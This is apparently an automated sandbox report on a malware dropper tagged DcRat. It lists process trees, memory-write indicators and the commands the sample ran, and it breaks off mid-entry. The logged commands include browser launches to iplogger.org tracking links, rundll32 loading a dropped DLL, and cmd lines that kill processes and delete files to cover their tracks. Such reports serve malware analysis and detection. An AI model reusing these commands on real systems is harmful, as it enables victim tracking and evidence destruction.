pid	process
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
5096	msedge.exe
5096	msedge.exe
2232
5096	msedge.exe
2232
2232
2232
2232
2180	Accostarmi.exe.pif
2232
2232
2180	Accostarmi.exe.pif
2180	Accostarmi.exe.pif
2232
2232

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

File.exeAccostarmi.exe.pif

pid	process
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
3804	File.exe
2180	Accostarmi.exe.pif
2180	Accostarmi.exe.pif
2180	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

File.exeT0jlrpsGGUYr4eISutfzJGw3.exefhvct4NKRv1MuwyM8AyODJx_.exevUSKLYkUlN7iZZdPiIOcfRq9.exe8LYdi6ebdnfzHFB1_bWgzJGK.exe6mM5wc4MNICotg_rhaS83KUX.exeDyxVIXsNsKer_eZTImK_hMIG.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exexnPfNBTqQGpxzwtTAJgl0Pwi.exe9FJLQu4A_WqLnwf6TNi2ThAm.exe75BsMTOUWXlbqzaIQpyJ6if7.exeBJEsf_U8Nn986YcrD7DpuoI2.exeQM0VjrM43wjfbjwxlnNpeiLt.exefindstr.exeInstall.exeKJAC6.exeBFE5C.exe57F2H.exeInstall.exe1CILB.execonhost.exe1CILB33H9E8BCC5.exeAccostarmi.exe.pif

pid	process
4904	File.exe
5404	T0jlrpsGGUYr4eISutfzJGw3.exe
5472	fhvct4NKRv1MuwyM8AyODJx_.exe
5496	vUSKLYkUlN7iZZdPiIOcfRq9.exe
5476	8LYdi6ebdnfzHFB1_bWgzJGK.exe
5472	fhvct4NKRv1MuwyM8AyODJx_.exe
5536	6mM5wc4MNICotg_rhaS83KUX.exe
5832	DyxVIXsNsKer_eZTImK_hMIG.exe
5836	gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
5852	xtqmxtTKWEfE8t8uqfXbvBNB.exe
5736	xnPfNBTqQGpxzwtTAJgl0Pwi.exe
5412	9FJLQu4A_WqLnwf6TNi2ThAm.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
6020	BJEsf_U8Nn986YcrD7DpuoI2.exe
3588	QM0VjrM43wjfbjwxlnNpeiLt.exe
5432	findstr.exe
6076	Install.exe
5652	KJAC6.exe
648	BFE5C.exe
3440	57F2H.exe
5312	Install.exe
4252	1CILB.exe
1804	conhost.exe
5336	1CILB33H9E8BCC5.exe
5336	1CILB33H9E8BCC5.exe
1804	conhost.exe
2180	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeFiles.exemsedge.exeFolder.exepzyh.exeInstallation.execmd.exemsedge.exe

description	pid	process	target process
PID 2680 wrote to memory of 3616	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Files.exe
PID 2680 wrote to memory of 3616	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Files.exe
PID 2680 wrote to memory of 3616	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Files.exe
PID 2680 wrote to memory of 3464	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	KRSetp.exe
PID 2680 wrote to memory of 3464	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	KRSetp.exe
PID 3616 wrote to memory of 3804	3616	Files.exe	File.exe
PID 3616 wrote to memory of 3804	3616	Files.exe	File.exe
PID 3616 wrote to memory of 3804	3616	Files.exe	File.exe
PID 2680 wrote to memory of 5096	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	msedge.exe
PID 2680 wrote to memory of 5096	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	msedge.exe
PID 2680 wrote to memory of 3720	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Folder.exe
PID 2680 wrote to memory of 3720	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Folder.exe
PID 2680 wrote to memory of 3720	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Folder.exe
PID 5096 wrote to memory of 4516	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4516	5096	msedge.exe	msedge.exe
PID 2680 wrote to memory of 988	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Info.exe
PID 2680 wrote to memory of 988	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Info.exe
PID 2680 wrote to memory of 988	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Info.exe
PID 2680 wrote to memory of 4904	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	File.exe
PID 2680 wrote to memory of 4904	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	File.exe
PID 2680 wrote to memory of 4904	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	File.exe
PID 2680 wrote to memory of 4268	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Install.exe
PID 2680 wrote to memory of 4268	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Install.exe
PID 2680 wrote to memory of 4268	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Install.exe
PID 2680 wrote to memory of 380	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	jg3_3uag.exe
PID 2680 wrote to memory of 380	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	jg3_3uag.exe
PID 2680 wrote to memory of 380	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	jg3_3uag.exe
PID 2680 wrote to memory of 5116	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pzyh.exe
PID 2680 wrote to memory of 5116	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pzyh.exe
PID 2680 wrote to memory of 5116	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pzyh.exe
PID 2680 wrote to memory of 5080	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Installation.exe
PID 2680 wrote to memory of 5080	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Installation.exe
PID 2680 wrote to memory of 5080	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	Installation.exe
PID 2680 wrote to memory of 4636	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pub2.exe
PID 2680 wrote to memory of 4636	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pub2.exe
PID 2680 wrote to memory of 4636	2680	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe	pub2.exe
PID 3720 wrote to memory of 3296	3720	Folder.exe	rUNdlL32.eXe
PID 3720 wrote to memory of 3296	3720	Folder.exe	rUNdlL32.eXe
PID 3720 wrote to memory of 3296	3720	Folder.exe	rUNdlL32.eXe
PID 5116 wrote to memory of 2716	5116	pzyh.exe	jfiag3g_gg.exe
PID 5116 wrote to memory of 2716	5116	pzyh.exe	jfiag3g_gg.exe
PID 5116 wrote to memory of 2716	5116	pzyh.exe	jfiag3g_gg.exe
PID 5080 wrote to memory of 4924	5080	Installation.exe	cmd.exe
PID 5080 wrote to memory of 4924	5080	Installation.exe	cmd.exe
PID 5080 wrote to memory of 4924	5080	Installation.exe	cmd.exe
PID 4924 wrote to memory of 2300	4924	cmd.exe	taskkill.exe
PID 4924 wrote to memory of 2300	4924	cmd.exe	taskkill.exe
PID 4924 wrote to memory of 2300	4924	cmd.exe	taskkill.exe
PID 3616 wrote to memory of 2768	3616	Files.exe	msedge.exe
PID 3616 wrote to memory of 2768	3616	Files.exe	msedge.exe
PID 2768 wrote to memory of 2744	2768	msedge.exe	msedge.exe
PID 2768 wrote to memory of 2744	2768	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe
PID 5096 wrote to memory of 4864	5096	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
"C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe"
1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2680

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3616

C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
3⤵
- Suspicious use of WriteProcessMemory
PID:2768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd4,0x10c,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b4718
4⤵
PID:2744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
4⤵
PID:3844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4344

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b4718
3⤵
PID:4516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
3⤵
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
3⤵
PID:5020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
3⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
3⤵
PID:1932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
3⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5244 /prefetch:8
3⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
3⤵
PID:3220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
3⤵
PID:644

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff752365460,0x7ff752365470,0x7ff752365480
4⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8
3⤵
PID:2128

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8
3⤵
PID:4044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3208 /prefetch:2
3⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
3⤵
- Loads dropped DLL
PID:3296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 600
4⤵
- Program crash
PID:1284

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe
"C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 460
4⤵
- Program crash
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 480
4⤵
- Program crash
PID:836

C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe
"C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 476
4⤵
- Program crash
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 496
4⤵
- Program crash
PID:2028

C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe
"C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:1308

C:\Windows\SysWOW64\taskkill.exe
taskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f
5⤵
- Kills process with taskkill
PID:4680

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:5704

C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe
"C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5476

C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe
"C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe"
3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5472

C:\Windows\SysWOW64\cmmon32\conhost.exe
"C:\Windows\System32\cmmon32\conhost.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1804

C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe
"C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:5596

C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe
"C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5320

C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe
"C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe"
3⤵
- Executes dropped EXE
PID:5636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 624
4⤵
- Program crash
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 632
4⤵
- Program crash
PID:3120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 652
4⤵
- Program crash
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 800
4⤵
- Program crash
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1244
4⤵
- Program crash
PID:1688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1252
4⤵
- Program crash
PID:1848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1212
4⤵
- Program crash
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1244
4⤵
- Program crash
PID:5244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f & erase "C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe" & exit
4⤵
PID:3428

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f
5⤵
- Kills process with taskkill
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1104
4⤵
- Program crash
PID:5264

C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe
"C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe"
3⤵
- Executes dropped EXE
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe
4⤵
PID:3632

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:1628

C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe
"C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 460
4⤵
- Program crash
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 480
4⤵
- Program crash
PID:3180

C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe
"C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5852

C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe
"C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe"
3⤵
- Executes dropped EXE
PID:4048

C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe
"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"
4⤵
PID:1944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5980

C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe
